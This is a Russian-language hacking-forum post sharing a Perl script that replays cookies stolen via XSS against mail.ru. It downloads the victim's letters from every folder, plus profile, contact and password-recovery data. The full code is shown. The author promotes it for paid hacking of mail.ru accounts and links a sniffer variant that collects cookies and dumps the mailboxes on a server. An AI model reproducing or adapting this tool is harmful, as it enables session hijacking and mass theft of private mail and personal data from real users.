Форум АНТИЧАТ - Показать сообщение отдельно

Ребят ... а можно я старое описание оставлю .. а ?! =\
Ибо правда заеп... скажу только что код уменьшил в три раза, улучил функционал, исправил багесы, старая версия кстать загнулась ... вобщем прошу любить и жаловать

[N3w t00lz by mE]

Наверняка каждому из вас приходилось или приходиться иметь дело с XSS на mail.ru т.к в данный момент это самая актуальная бага на выше упомянутом сервере ....

как нам уже известно сессия не живёт вечно и желательно за небольшой промежуток времени собрать максимально большое количество информации...

Думаю именно в тут вам и поможет эта тулза... в ее задачи как раз и входить ..

слить анкетные данные, персональную информацию, контактную информацию, данные для восстановления пароля
слить письма с таких директорий, как:
- Входящие
- Сомнительные
- Отправленные
- Корзина

Кому сможет пригодиться этот скрипт?!

ИМХО всем .. от мала до велика....
пригодится тем у кого "напряг" со временем...
пригодится ленивым ... кому лень рыться на ящике и сливать в ручную...
пригодится незнающим .. те у кого проблема с тем что бы поменять кукисы...
пригодится тем кто делает бизнесс на хеке майл.ру ... например .. фейк не сработал ... а сессию вы получили ... не отдадите же вы заказчику окуратно записаные кукисы?!... заказчик наверняка кроме как распечатать и повешать их на стенку ничего не придумает

P.S: Если нуна .. то можно сделать версию а-ля сниффер ... будет собирать кукису и аккуратненько дамрить всё на сервере.....

PHP код:


		
			
#!/usr/bin/perl 



## Сoded by [slider]

## http://forum.antichat.ru



## hello 2 my friends: brain[pillow], genom-- , cy4_, ... and .. and .. m0nzt3r - loleg :-P



use IO::Socket;



$cookies = q(ТУТ БУДЕТ КУКИСА);



print  '-' x 56 . "\n [i] Coded by slider \n [i] forum.antichat.ru\n" . '-' x 56 . "\n\n";

information();create_dir();private();inbox();outbox();doubtful();trash();



sub requester{

    $rqst = IO::Socket::INET->new(PeerAddr=>'win.mail.ru', PeerPort=>'80', Proto=>'tcp', Timeout=>'30') || print "Error! $!\n";

    if($_[2] == 1){print $rqst "GET /cgi-bin/msglist?folder=$_[0]&page=9999999999999999 HTTP/1.0\r\nHost: win.mail.ru\r\nCookie: ".$cookies.";\r\n\r\n";

    while($answer = <$rqst>){if ($answer =~ /$_[1]/){return $1}}}

    if($_[2] == 2){print $rqst "GET $_[0] HTTP/1.0\r\nHost: win.mail.ru\r\nCookie: ".$cookies.";\r\n\r\n";

    open (mailbox, $_[1]);while($answer = <$rqst>){print mailbox $answer;}}

    if($_[2] == 3){

    print $rqst "GET $_[0]$p HTTP/1.0\r\nHost: win.mail.ru\r\nCookie: ".$cookies.";\r\n\r\n";    

    while($answer = <$rqst>){

    if ($answer =~ /td class=lettem><a href="readmsg\?id=(.*)"/){

    print "  [~] MID: $1 && PAGE: $p \n";    

    open (mailbox, ">./mailbox/$email/$_[1]/$p.$1.html");

    $connect = IO::Socket::INET->new(PeerAddr=>'win.mail.ru', PeerPort=>'80', Proto=>'tcp', Timeout=>'30') || print "Error! $!\n";

    print $connect "GET /cgi-bin/sentmsg?reply&id=$1 HTTP/1.0\r\nHost: win.mail.ru\r\nCookie: ".$cookies.";\r\n\r\n";

    while($answer = <$connect>)

    {print mailbox $answer;}}}}

}



sub create_dir{

    if ( ! -e "mailbox" ){mkdir "mailbox", 0755 or die "[~] Can't create mailbox: $!\n";}     

    if ( ! -e "mailbox/$email" ){mkdir "mailbox/$email", 0755 or die "[~] Can't create mailbox/$email: $!\n";}     

    if ( ! -e "mailbox/$email/inbox" ){mkdir "mailbox/$email/inbox", 0755 or die "[~] Can't create mailbox/$email/inbox: $!\n";}         

    if ( ! -e "mailbox/$email/outbox" ){mkdir "mailbox/$email/outbox", 0755 or die "[~] Can't create $email/outbox: $!\n";}         

    if ( ! -e "mailbox/$email/doubtful" ){mkdir "mailbox/$email/doubtful", 0755 or die "[~] Can't create $email/doubtful: $!\n";}         

    if ( ! -e "mailbox/$email/trash" ){mkdir "mailbox/$email/trash", 0755 or die "[~] Can't create $email/trash: $!\n";}         

    if ( ! -e "mailbox/$email/private" ){mkdir "mailbox/$email/private", 0755 or die "[~] Can't create $email/private: $!\n";}         

        print "[!] Creating directory: ok\n";$o = '['.'-'x 5;

}



sub information{

    $reg_last_p = '<b class=odin>&middot;&nbsp;(.*)&nbsp;&middot;<\/b';

    print "[!] Get information:\n\n";$o = '['.'-'x5;

    $email=requester(0,'<nobr>(.*)<\/nobr><\/td><form action=logout>',1);if(!$email){$email='!!WRONG!!';die("Something wrong: e-mail\n")}

    print "[- E-mail: $email\n[\n";

    $ilp=requester(0,$reg_last_p,1);if(!$ilp){$ilp=1;}print $o." Inbox    (last_page): $ilp\n";

    $somn=requester(950,$reg_last_p,1);if(!$somn){$somn=1;}print $o." Doubtful (last_page): $somn\n";

    $outbox=requester(500000,$reg_last_p,1);if(!$outbox){$outbox=1;}print $o." Outbox   (last_page): $outbox\n";

    $trash=requester(500002,$reg_last_p,1);if(!$trash){$trash=1;}print $o." Trash    (last_page): $trash\n\n";

}



sub private{

    print "[*] Getting private information: ";

    requester('/cgi-bin/userinfo',">./mailbox/$email/private/userinfo_1.html",2);

    requester('/cgi-bin/anketa?page=1',">./mailbox/$email/private/anketa_1.html",2);

    requester('/cgi-bin/anketa?page=2',">./mailbox/$email/private/anketa_2.html",2);

    requester('/cgi-bin/userinfo?mra=1',">./mailbox/$email/private/userinfo_2.html",2);

    requester('/cgi-bin/start',">./mailbox/$email/private/index.html",2);

    print "ok\n\n"

}



sub inbox{

    print "[!] Geting: INBOX:\n\n";

    for($p=1;$p<$ilp+1;$p++){

    requester("/cgi-bin/msglist?folder=0&page=",'inbox',3);

    print "  [~] ok \n";}

}



sub outbox{

    print "\n[!] Geting: OUTBOX:\n\n";

    for($p=1;$p<$outbox+1;$p++){

    requester("/cgi-bin/msglist?folder=500000&page=",'outbox',3);

    print "  [~] ok \n";}

}



sub doubtful{

    print "\n[!] Geting: DOUBTFUL:\n\n";

    for($p=1;$p<$somn+1;$p++){

    requester("/cgi-bin/msglist?folder=950&page=",'doubtful',3);

    print "  [~] ok \n";}

}



sub trash{

    print "\n[!] Geting: TRASH:\n\n";

    for($p=1;$p<$trash+1;$p++){

    requester("/cgi-bin/msglist?folder=500002&page=",'TRASH',3);

    print "  [~] ok \n";}

}

    

## Active Perl:

## http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.8.820-MSWin32-x86-274739.msi



## Antichat.ru

Download here:http://webfile.ru/3794238

------------------------------------------------------------------------------------------------------

Долгожданная версия дампера под сниффер

- такс... а как юзать!?..
Да элементарно.. при юзании ксс подставляем ссылку на этот скрипт

- ещё что то!?..
ну да... подправьте положение перловы в первой строке: #!"C:\perl\bin\perl.exe" на ваш путь..

ммм... а так же установите нужные права... + убедитесь что в папке со скриптом стоят права на запись =)

Download here:http://webfile.ru/3815167